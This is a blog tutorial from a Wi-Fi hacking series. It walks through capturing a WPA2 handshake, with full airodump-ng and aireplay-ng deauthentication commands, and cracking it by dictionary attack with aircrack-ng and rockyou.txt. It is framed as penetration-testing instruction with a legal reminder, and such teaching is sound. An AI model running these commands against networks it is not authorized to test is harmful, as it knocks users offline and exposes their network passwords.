Hack That Shit
Cracking WPAWPA2 Handshakes with Aircrack-ng

Cracking WPA/WPA2 Handshakes with Aircrack-ng

by

Introduction

Now that you’ve learned how to capture a WPA2 handshake using deauthentication (Part 5), it’s time to crack it. This is where the real challenge begins — WPA2 isn’t flawed like WEP, but it can still be cracked with a good handshake and a strong wordlist.

Let’s break it down.

❓ How WPA2 Cracking Works

WPA2 uses a 4-way handshake when devices connect to the network. By capturing this handshake, we can attempt to brute-force the password using a dictionary attack.

⚠️ This method doesn’t “decrypt” the network. It tests passwords against the captured handshake until it finds a match.

🧰 Tools Needed

  • Kali Linux with aircrack-ng

  • Wi-Fi adapter in monitor mode

  • Captured handshake file (.cap)

  • Wordlist (e.g., rockyou.txt)

Step-by-Step: Cracking WPA2 Handshakes

1. Capture the Handshake

As explained in Part 5, use the following command to start capturing:

sudo airodump-ng --bssid <BSSID> --channel <CH> -w handshake wlan0mon

Then, in a new terminal, trigger deauthentication:

sudo aireplay-ng --deauth 10 -a <BSSID> wlan0mon

Wait for a client to reconnect. If successful, you’ll see:

WPA handshake: <BSSID>

2. Verify the Capture

Check if the handshake was properly captured using:

aircrack-ng handshake-01.cap

If it says:

WPA handshake found

…you’re good to proceed.

3. Choose Your Wordlist

A wordlist is a text file containing thousands (or even millions) of possible passwords.

Kali comes with the popular rockyou.txt wordlist:

/usr/share/wordlists/rockyou.txt

You can also download larger lists from:

4. Crack the Handshake

Use aircrack-ng with your wordlist and captured file:

aircrack-ng -w /path/to/wordlist.txt -b <BSSID> handshake-01.cap

Explanation:

  • -w: Path to wordlist
  • -b: Target router’s MAC address (BSSID)
  • handshake-01.cap: Captured handshake file

Aircrack-ng will test each password until it finds a match.

🎉 Success!

If cracked successfully, you’ll see something like:

KEY FOUND! [ password123 ]

Tips to Improve Success

  • Cracking depends on password strength — weak ones break fast

  • Larger wordlists = higher chances, but slower

  • Use crunch or cewl to make custom wordlists

  • Capture multiple handshakes if needed — some might be cleaner

Legal & Ethical Reminder

Only test on your own network or one you’ve been authorized to test. Capturing or cracking WPA2 handshakes on unauthorized networks is illegal.

Wrapping Up

You now know how to perform a dictionary attack on WPA2 handshakes using aircrack-ng — one of the most widely used methods in real-world Wi-Fi penetration testing.

Next up:
Part 8 – Bruteforcing WPA2 with Hashcat & GPU Power

We’ll take things to the next level with GPU acceleration and advanced cracking using Hashcat.

1 thought on “Cracking WPA/WPA2 Handshakes with Aircrack-ng”

  1. Pingback: Cracking WEP – The Easiest Wi-Fi Hack

Leave a comment

Table of Contents

Index